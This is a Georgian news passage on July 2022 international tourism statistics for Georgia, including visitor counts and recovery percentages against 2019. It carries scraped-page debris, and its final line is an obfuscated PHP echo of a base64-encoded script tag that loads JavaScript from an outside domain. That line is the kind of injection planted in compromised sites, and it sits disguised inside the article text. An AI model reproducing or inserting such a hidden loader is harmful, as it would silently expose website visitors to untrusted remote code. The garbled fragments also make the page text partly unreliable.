celsiusi
ავერსი შნაიდერი
ტურიზმის ეროვნული ადმინისტრაცია ივლისის თვის სტატისტიკურ მონაცემებს აქვეყნებს. ადმიისტრაციის ცნობით, მიმდინარე  წლის ივლისში საქართველოში 718,401 საერთაშორისო მოგზაურის ვიზიტი განხორციელდა, რაც 2021  წლის ივლისის თვესთან შედარებით + 177% -იან  ზრდას წარმოადგენს, საერთაშორისო მოგზაურების აღდგენის კოეფიციენტი კი 2019 წლის მონაცემებთან შედარებით 65,3 პროცენტს შეადგენს.
 
ივლისში საერთაშორისო ტურისტული ვიზიტების რაოდენობამ 459,711 შეადგინა, რაც + +115%-ით მეტია გასული წლის ანალოგიურ პერიოდთან შედარებით, ხოლო 2019 წლის ივლისის თვის მონაცემებთან შედარებით ტურისტული ვიზიტები 80.6% %-ით არის აღდგენილი.
 
2022 წლის იანვარ-ივლისში საქართველოში 2,344,329 საერთაშორისო მოგზაურის ვიზიტი განხორციელდა, ზრდა 2021 წლის 7 თვის მონაცემებთან შედარებით  +214%  – ია,  ხოლო 2019 წლის ანალოგიურ პერიოდთან შედარებით აღდგენამ 47.2% შეადგინა.
 
2022 წლის 7 თვეში  საერთაშორისო ტურისტული ვიზიტების რაოდენობამ  1,668,983 შეადგინა, რაც +162%-ით მეტია გასული წლის ანალოგიურ პერიოდთან შედარებით, ხოლო 2019 წლის მონაცემებთან შედარებით ტურისტული  ვიზიტები 61.9% -ით არის აღდგენილი.
805
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");